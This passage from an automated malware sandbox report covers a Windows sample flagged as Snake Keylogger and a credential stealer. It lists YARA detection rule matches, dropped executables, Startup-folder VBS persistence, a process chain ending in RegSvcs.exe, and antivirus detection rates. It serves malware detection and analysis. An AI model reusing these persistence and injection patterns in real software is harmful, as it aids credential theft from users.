                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeCode function: 6_2_02D668806_2_02D66880
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeCode function: 6_2_02D698586_2_02D69858
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeCode function: 6_2_02D6BEB06_2_02D6BEB0
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeCode function: 6_2_02D6B4F26_2_02D6B4F2
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeCode function: 6_2_02D635706_2_02D63570
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 8_2_016008308_2_01600830
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe E61B8F44AB92CF0F9CB1101347967D31E1839979142A4114A7DD02AA237BA021
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: String function: 00B88900 appears 39 times
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: String function: 00007FF75ECFA3A0 appears 38 times
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: String function: 00007FF75ECECD00 appears 40 times
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: String function: 00007FF75ED2BFC0 appears 36 times
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: String function: 00007FF75ECF2890 appears 137 times
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: String function: 00007FF75ED7FC60 appears 60 times
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: String function: 00007FF75ED05360 appears 66 times
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: String function: 00007FF75ECDC110 appears 48 times
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: String function: 00007FF75ECECC30 appears 150 times
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: String function: 00007FF75ED06360 appears 62 times
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: String function: 00007FF75ED7B8AC appears 457 times
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: String function: 00007FF75ED82CE8 appears 33 times
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: String function: 00007FF75ED2A5D0 appears 78 times
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: String function: 008B8900 appears 39 times
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: String function: 00897DE1 appears 34 times
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: String function: 008B0AE3 appears 70 times
                  Source: 8kDIr4ZdNj.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.RegSvcs.exe.8982ac.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.lecheries.exe.4100000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.lecheries.exe.42964ac.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.lecheries.exe.3e60000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.lecheries.exe.3ff64ac.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: lecheries.exe PID: 4596, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: lecheries.exe PID: 4596, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: RegSvcs.exe PID: 3496, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 3496, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: EmbeddedExe2.exe PID: 6968, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: EmbeddedExe2.exe PID: 6968, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: lecheries.exe PID: 2276, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: lecheries.exe PID: 2276, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPEDMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@22/15@2/2
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FA06A GetLastError,FormatMessageW,0_2_008FA06A
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008E81CB AdjustTokenPrivileges,CloseHandle,0_2_008E81CB
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008E87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_008E87E1
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_008FB3FB
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_0090EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0090EE0D
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FC397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_008FC397
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_00894E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00894E89
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeFile created: C:\Users\user\AppData\Local\konkedJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3460:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3820:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1588:120:WilError_03
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeFile created: C:\Users\user\AppData\Local\Temp\aut1FFC.tmpJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs"
                  Source: 8kDIr4ZdNj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 8kDIr4ZdNj.exeVirustotal: Detection: 70%
                  Source: 8kDIr4ZdNj.exeReversingLabs: Detection: 65%
                  Source: EmbeddedExe1.exeString found in binary or memory: config-serial-stopbits
                  Source: EmbeddedExe1.exeString found in binary or memory: config-address-family
                  Source: EmbeddedExe1.exeString found in binary or memory: config-ssh-portfwd-address-family
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeFile read: C:\Users\user\Desktop\8kDIr4ZdNj.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\8kDIr4ZdNj.exe "C:\Users\user\Desktop\8kDIr4ZdNj.exe"
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeProcess created: C:\Users\user\AppData\Local\konked\lecheries.exe "C:\Users\user\Desktop\8kDIr4ZdNj.exe"
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\8kDIr4ZdNj.exe"
